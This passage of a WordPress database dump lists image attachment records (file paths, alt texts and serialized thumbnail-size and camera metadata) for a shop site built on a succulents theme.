e\";s:28:\"what-we-do-img-2-243x240.png\";s:5:\"width\";i:243;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"what-we-do-img-2-243x300.png\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1551,1810,'_wp_attachment_image_alt','a'),(1552,1021,'_wp_attachment_image_alt','o'),(1553,1811,'_wp_attached_file','2018/02/portfolio-img-9.jpg'),(1554,1811,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2018/02/portfolio-img-9.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"portfolio-img-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"portfolio-img-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1555,1028,'_wp_attached_file','2018/01/h1-slide2-background.jpg'),(1556,1028,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:654;s:4:\"file\";s:32:\"2018/01/h1-slide2-background.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h1-slide2-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"h1-slide2-background-1024x349.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-768x262.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:33:\"h1-slide2-background-1536x523.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:523;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"h1-slide2-background-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-550x654.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h1-slide2-background-1100x654.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"h1-slide2-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h1-slide2-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1557,2475,'_wp_attachment_image_alt','a'),(1558,2476,'_wp_attached_file','2018/01/product-12.jpg'),(1559,2476,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2018/01/product-12.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"product-12-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"product-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"product-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"product-12-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"product-12-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"product-12-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"product-12-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"product-12-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"product-12-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"product-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"product-12-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1560,470,'_wp_attachment_image_alt','o'),(1561,541,'_wp_attached_file','2018/01/pin.png'),(1562,541,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:35;s:6:\"height\";i:43;s:4:\"file\";s:15:\"2018/01/pin.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1563,541,'_wp_attachment_image_alt','o'),(1564,553,'_wp_attached_file','2018/01/h3-img1.png'),(1565,553,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:438;s:6:\"height\";i:239;s:4:\"file\";s:19:\"2018/01/h3-img1.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h3-img1-300x239.png\";s:5:\"width\";i:300;s:6:\"height\";i:239;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h3-img1-300x164.png\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"h3-img1-300x239.png\";s:5:\"width\";i:300;s:6:\"height\";i:239;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"h3-img1-300x239.png\";s:5:\"width\";i:300;s:6:\"height\";i:239;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1566,1811,'_wp_attachment_image_alt','a'),(1567,4264,'_wp_attachment_image_alt','a'),(1568,3941,'_wp_attachment_image_alt','a'),(1569,1812,'_wp_attached_file','2018/02/portfolio-img-10.jpg'),(1570,1812,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2018/02/portfolio-img-10.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"portfolio-img-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"portfolio-img-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1571,3943,'_wp_attached_file','2018/01/drink-ornage-new-website-1.jpg'),(1572,3943,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:630;s:4:\"file\";s:38:\"2018/01/drink-ornage-new-website-1.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"drink-ornage-new-website-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480761825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1573,4265,'_wp_attached_file','2018/01/recipe-img-1-1.jpg'),(1574,4265,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:26:\"2018/01/recipe-img-1-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"recipe-img-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"recipe-img-1-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"recipe-img-1-1-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"recipe-img-1-1-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"recipe-img-1-1-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"recipe-img-1-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"recipe-img-1-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"recipe-img-1-1-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"recipe-img-1-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"recipe-img-1-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"recipe-img-1-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"recipe-img-1-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"recipe-img-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"recipe-img-1-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1575,2476,'_wp_attachment_image_alt','a'),(1576,553,'_wp_attachment_image_alt','a'),(1577,3310,'_wp_attachment_image_alt','o'),(1578,3311,'_wp_attachment_image_alt',''),(1579,3312,'_wp_attachment_image_alt',''),(1580,3313,'_wp_attachment_image_alt','o'),(1581,3314,'_wp_attachment_image_alt',''),(1582,3315,'_wp_attachment_image_alt','o'),(1583,3316,'_wp_attachment_image_alt',''),(1584,3346,'_wp_attachment_image_alt','a'),(1585,3368,'_wp_attachment_image_alt','a'),(1586,3369,'_wp_attachment_image_alt','a'),(1587,3376,'_wp_attachment_image_alt','a'),(1588,3377,'_wp_attachment_image_alt','a'),(1589,3396,'_wp_attachment_image_alt','o'),(1590,3397,'_wp_attachment_image_alt','o'),(1591,3398,'_wp_attachment_image_alt','o'),(1592,2477,'_wp_attached_file','2018/01/product-13.jpg'),(1593,2477,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2018/01/product-13.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-13-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"product-13-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"product-13-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"product-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i: